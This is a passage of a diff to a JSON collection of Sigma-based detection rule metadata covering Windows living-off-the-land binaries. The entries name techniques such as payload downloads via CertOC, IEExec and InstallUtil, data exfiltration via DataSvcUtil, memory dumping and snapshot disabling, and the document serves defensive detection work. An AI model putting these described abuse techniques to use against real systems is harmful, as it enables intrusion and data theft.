"https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", - "https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml", - "https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A", - "https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbins_by_office_applications.yml" + "https://gist.github.com/am0nsec/8378da08f848424e4ab0cc5b317fdd26", + "https://twitter.com/subTee/status/1216465628946563073", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_task_folder_evasion.yml" ], "tags": [ - "attack.t1204.002", - "attack.t1047", - "attack.t1218.010", + "attack.defense_evasion", + "attack.persistence", "attack.execution", - "attack.defense_evasion" - ] - }, - "uuid": "23daeb52-e6eb-493c-8607-c4f0246cb7d8", - "value": "New Lolbin Process by Office Applications" - }, - { - "description": "This rule will monitor LOLBin process creations by wmiprvse. Add more LOLBins to rule logic if needed.", - "meta": { - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", - "creation_date": "2021/08/23", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbins_with_wmiprvse_parent_process.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", - "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbins_with_wmiprvse_parent_process.yml" - ], - "tags": [ - "attack.t1204.002", - "attack.t1047", - "attack.t1218.010", - "attack.execution", - "attack.defense_evasion" - ] - }, - "uuid": "8a582fe2-0882-4b89-a82a-da6b2dc32937", - "value": "Lolbins Process Creation with WmiPrvse" - }, - { - "description": "The \"AdPlus.exe\" binary that is part of the Windows SDK can be used as a lolbin to dump process memory and execute arbitrary commands", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/09", - "falsepositive": [ - "Legitimate usage of Adplus" - ], - "filename": "proc_creation_win_lolbin_adplus.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/", - "https://twitter.com/nas_bench/status/1534916659676422152", - "https://twitter.com/nas_bench/status/1534915321856917506", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1003.001" - ] - }, - "uuid": "2f869d59-7f6a-4931-992c-cce556ff2d53", - "value": "Use of Adplus.exe" - }, - { - "description": "Execute C# code with the Build Provider and proper folder structure in place.", - "meta": { - "author": "frack113", - "creation_date": "2021/11/24", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_aspnet_compiler.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_aspnet_compiler.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ] - }, - "uuid": "a01b8329-5953-4f73-ae2d-aa01e1f35f00", - "value": "Suspicious aspnet_compiler.exe Execution" - }, - { - "description": "Performs execution of specified file, can be used for defensive evasion.", - "meta": { - "author": "frack113", - "creation_date": "2021/11/24", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_bash.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Bash/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ] - }, - "uuid": "5edc2273-c26f-406c-83f3-f4d948e740dd", - "value": "Suspicious Subsystem for Linux Bash Execution" - }, - { - "description": "Detects when a user downloads file by using CertOC.exe", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/05/16", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_certoc_download.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Certoc/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_certoc_download.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "70ad0861-d1fe-491c-a45f-fa48148a300d", - "value": "Suspicious File Download via CertOC.exe" - }, - { - "description": "Detects the execution of Xwizard tool with specific arguments which utilized to run custom class properties.", - "meta": { - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", - "creation_date": "2020/10/07", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_class_exec_xwizard.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Xwizard/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "53d4bb30-3f36-4e8a-b078-69d36c4a79ff", - "value": "Custom Class Execution via Xwizard" - }, - { - "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", - "meta": { - "author": "oscd.community, Natalia Shornikova", - "creation_date": "2020/10/14", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_cl_invocation.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", - "https://twitter.com/bohops/status/948061991012327424", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cl_invocation.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ] - }, - "uuid": "a0459f02-ac51-4c09-b511-b8c9203fc429", - "value": "Execution via CL_Invocation.ps1" - }, - { - "description": "Detects the use of a Microsoft signed script to execute commands and bypassing AppLocker.", - "meta": { - "author": "frack113", - "creation_date": "2022/05/21", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_cl_loadassembly.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/", - "https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cl_loadassembly.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ] - }, - "uuid": "c57872c7-614f-4d7f-a40d-b78c8df2d30d", - "value": "CL_LoadAssembly.ps1 Proxy Execution" - }, - { - "description": "Detects the use of a Microsoft signed script to execute commands", - "meta": { - "author": "oscd.community, Natalia Shornikova, frack113", - "creation_date": "2022/05/21", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_cl_mutexverifiers.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cl_mutexverifiers.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ] - }, - "uuid": "1e0e1a81-e79b-44bc-935b-ddb9c8006b3d", - "value": "CL_Mutexverifiers.ps1 Proxy Execution" - }, - { - "description": "lolbas Cmdl32 is use to download a payload to evade antivirus", - "meta": { - "author": "frack113", - "creation_date": "2021/11/03", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_cmdl32.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/", - "https://twitter.com/SwiftOnSecurity/status/1455897435063074824", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cmdl32.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218", - "attack.t1202" - ] - }, - "uuid": "f37aba28-a9e6-4045-882c-d5004043b337", - "value": "Suspicious Cmdl32 Execution" - }, - { - "description": "Upload file, credentials or data exfiltration with Binary part of Windows Defender", - "meta": { - "author": "frack113", - "creation_date": "2021/11/26", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_configsecuritypolicy.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1567" - ] - }, - "uuid": "1f0f6176-6482-4027-b151-00071af39d7e", - "value": "Suspicious ConfigSecurityPolicy Execution" - }, - { - "description": "Adversaries can abuse of C:\\Windows\\System32\\gatherNetworkInfo.vbs script along with cscript.exe to gather information about the target", - "meta": { - "author": "blueteamer8699", - "creation_date": "2022/01/03", - "falsepositive": [ - "Administrative activity" - ], - "filename": "proc_creation_win_lolbin_cscript_gathernetworkinfo.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cscript_gathernetworkinfo.yml" - ], - "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1615", - "attack.t1059.005" - ] - }, - "uuid": "575dce0c-8139-4e30-9295-1ee75969f7fe", - "value": "GatherNetworkInfo.vbs Script Usage" - }, - { - "description": "Detects the execution of CustomShellHost binary where the child isn't located in 'C:\\Windows\\explorer.exe'", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/19", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_customshellhost.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/pull/180", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_customshellhost.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ] - }, - "uuid": "84b14121-9d14-416e-800b-f3b829c5a14d", - "value": "Suspicious CustomShellHost Execution" - }, - { - "description": "Detects when a user performs data exfiltration by using DataSvcUtil.exe", - "meta": { - "author": "Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger", - "creation_date": "2021/09/30", - "falsepositive": [ - "DataSvcUtil.exe being used may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "DataSvcUtil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6", - "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe", - "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services", - "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services", - "https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1567" - ] - }, - "uuid": "e290b10b-1023-4452-a4a9-eb31a9013b3a", - "value": "LOLBAS Data Exfiltration by DataSvcUtil.exe" - }, - { - "description": "Detects the execution of DeviceCredentialDeployment to hide a process from view", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/19", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_lolbin_device_credential_deployment.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/pull/147", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "b8b1b304-a60f-4999-9a6e-c547bde03ffd", - "value": "DeviceCredentialDeployment Execution" - }, - { - "description": "Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.", - "meta": { - "author": "frack113", - "creation_date": "2021/11/26", - "falsepositive": [ - "Very Possible" - ], - "filename": "proc_creation_win_lolbin_diantz_ads.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Diantz/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_diantz_ads.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ] - }, - "uuid": "6b369ced-4b1d-48f1-b427-fdc0de0790bd", - "value": "Suspicious Diantz Alternate Data Stream Execution" - }, - { - "description": "Download and compress a remote file and store it in a cab file on local machine.", - "meta": { - "author": "frack113", - "creation_date": "2021/11/26", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_diantz_remote_cab.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Diantz/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "185d7418-f250-42d0-b72e-0c8b70661e93", - "value": "Suspicious Diantz Download and Compress Into a CAB File" - }, - { - "description": "Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/09/20", - "falsepositive": [ - "Windows installed on non-C drive" - ], - "filename": "proc_creation_win_lolbin_dll_sideload_xwizard.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Xwizard/", - "http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml" - ], - "tags": [ - "attack.defense_evasion", "attack.t1574.002" ] }, - "uuid": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", - "value": "Xwizard DLL Sideloading" + "uuid": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", + "value": "Tasks Folder Evasion" }, { - "description": "Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder", + "description": "Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).", "meta": { - "author": "Austin Songer @austinsonger, Florian Roth", - "creation_date": "2021/11/26", + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/09/12", "falsepositive": [ - "Dump64.exe in other folders than the excluded one" + "Legitimate usage of remote Powershell, e.g. for monitoring purposes." ], - "filename": "proc_creation_win_lolbin_dump64.yml", + "filename": "proc_creation_win_remote_powershell_session_process.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_powershell_session_process.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.t1021.006" + ] + }, + "uuid": "734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8", + "value": "Remote PowerShell Session Host Process (WinRM)" + }, + { + "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/22", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_renamed_rundll32_dllregisterserver.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/mrd0x/status/1460597833917251595", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dump64.yml" + "https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20", + "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml" ], "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution" ] }, - "uuid": "129966c9-de17-4334-a123-8b58172e664d", - "value": "Suspicious Dump64.exe Execution" + "uuid": "2569ed8c-1147-498a-9b8c-2ad3656b10ed", + "value": "DllRegisterServer Call From Non Rundll32" }, { - "description": "Adversaries can abuse winget to download payloads remotely and execute them without touching disk. Winget will be included by default in Windows 10 and is already available in Windows 10 insider programs. The manifest option enables you to install an application by passing in a YAML file directly to the client. Winget can be used to download and install exe's, msi, msix files later.", + "description": "Detects commands that temporarily turn off Volume Snapshots", "meta": { - "author": "Sreeman, Florian Roth, Frack113", - "creation_date": "2020/04/21", + "author": "Florian Roth", + "creation_date": "2021/01/28", "falsepositive": [ - "Admin activity installing packages not in the official Microsoft repo. Winget probably won't be used by most users." + "Legitimate administration" ], - "filename": "proc_creation_win_lolbin_execution_via_winget.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows/package-manager/winget/install#local-install", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_execution_via_winget.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "313d6012-51a0-4d93-8dfc-de8553239e25", - "value": "Monitoring Winget For LOLbin Execution" - }, - { - "description": "Extexport.exe loads dll and is execute from other folder the original path", - "meta": { - "author": "frack113", - "creation_date": "2021/11/26", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_extexport.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Extexport/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_extexport.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "fb0b815b-f5f6-4f50-970f-ffe21f253f7a", - "value": "Suspicious Extexport Execution" - }, - { - "description": "Download or Copy file with Extrac32", - "meta": { - "author": "frack113", - "creation_date": "2021/11/26", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_extrac32.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Extrac32/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "aa8e035d-7be4-48d3-a944-102aec04400d", - "value": "Suspicious Extrac32 Execution" - }, - { - "description": "Extract data from cab file and hide it in an alternate data stream", - "meta": { - "author": "frack113", - "creation_date": "2021/11/26", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_extrac32_ads.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Extrac32/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_extrac32_ads.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ] - }, - "uuid": "4b13db67-0c45-40f1-aba8-66a1a7198a1e", - "value": "Suspicious Extrac32 Alternate Data Stream Execution" - }, - { - "description": "Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism", - "meta": { - "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali", - "creation_date": "2020/10/05", - "falsepositive": [ - "Administrative findstr usage" - ], - "filename": "proc_creation_win_lolbin_findstr.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Findstr/", - "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/", - "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.t1564.004", - "attack.t1552.001", - "attack.t1105" - ] - }, - "uuid": "bf6c39fc-e203-45b9-9538-05397c1b4f3f", - "value": "Abusing Findstr for Defense Evasion" - }, - { - "description": "Execute commands and binaries from the context of \"forfiles\". This is used as a LOLBIN for example to bypass application whitelisting.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/14", - "falsepositive": [ - "Legitimate use by a via a batch script or by an administrator." - ], - "filename": "proc_creation_win_lolbin_forfiles.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Forfiles/", - "https://pentestlab.blog/2020/07/06/indirect-command-execution/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_forfiles.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "9aa5106d-bce3-4b13-86df-3a20f1d5cf0b", - "value": "Use of Forfiles For Execution" - }, - { - "description": "The FSharp Interpreters, FsiAnyCpu.exe and FSi.exe, can be used for AWL bypass and is listed in Microsoft recommended block rules.", - "meta": { - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", - "creation_date": "2022/06/02", - "falsepositive": [ - "Legitimate use by a software developer." - ], - "filename": "proc_creation_win_lolbin_fsharp_interpreters.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", - "https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "b96b2031-7c17-4473-afe7-a30ce714db29", - "value": "Use of FSharp Interpreters" - }, - { - "description": "Detects execution of ftp.exe script execution with the \"-s\" flag and any child processes ran by ftp.exe", - "meta": { - "author": "Victor Sergeev, oscd.community", - "creation_date": "2020/10/09", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_ftp.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Ftp/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ftp.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059", - "attack.defense_evasion", - "attack.t1202" - ] - }, - "uuid": "06b401f4-107c-4ff9-947f-9ec1e7649f1e", - "value": "LOLBIN Execution Of The FTP.EXE Binary" - }, - { - "description": "Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy", - "meta": { - "author": "frack113", - "creation_date": "2022/05/16", - "falsepositive": [ - "Legitimate uses of logon scripts distributed via group policy" - ], - "filename": "proc_creation_win_lolbin_gpscript.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/", - "https://lolbas-project.github.io/lolbas/Binaries/Gpscript/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "1e59c230-6670-45bf-83b0-98903780607e", - "value": "Gpscript Execution" - }, - { - "description": "Detect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories", - "meta": { - "author": "frack113", - "creation_date": "2022/05/07", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_ie4uinit.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/", - "https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ie4uinit.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "d3bf399f-b0cf-4250-8bb4-dfc192ab81dc", - "value": "Ie4uinit Lolbin Use From Invalid Path" - }, - { - "description": "Detects execution of the IEExec utility to download payloads", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/05/16", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_ieexec_download.yml", + "filename": "proc_creation_win_susp_volsnap_disable.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Ieexec/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ieexec_download.yml" - ], - "tags": "No established tags" - }, - "uuid": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", - "value": "Abusing IEExec To Download Payloads" - }, - { - "description": "Detect use of Ilasm.exe to compile c# code into dll or exe.", - "meta": { - "author": "frack113", - "creation_date": "2022/05/07", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_ilasm.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Ilasm/", - "https://www.echotrail.io/insights/search/ilasm.exe", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ilasm.yml" + "https://twitter.com/0gtweet/status/1354766164166115331", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_volsnap_disable.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.t1562.001" ] }, - "uuid": "850d55f9-6eeb-4492-ad69-a72338f65ba4", - "value": "Ilasm Lolbin Use Compile C-Sharp" - }, - { - "description": "Detects the use the .NET InstallUtil.exe application in order to download arbitrary files. The files will be written to %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE\\", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/19", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_installutil_download.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/pull/239", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_installutil_download.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "75edd216-1939-4c73-8d61-7f3a0d85b5cc", - "value": "Suspicious Execution of InstallUtil To Download" - }, - { - "description": "Detects the execution of the LOLBIN jsc.exe used by .NET to compile javascript code to .exe or .dll format", - "meta": { - "author": "frack113", - "creation_date": "2022/05/02", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_jsc.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Jsc/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_jsc.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ] - }, - "uuid": "52788a70-f1da-40dd-8fbd-73b5865d6568", - "value": "JSC Convert Javascript To Executable" - }, - { - "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/11/01", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_kavremover.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - 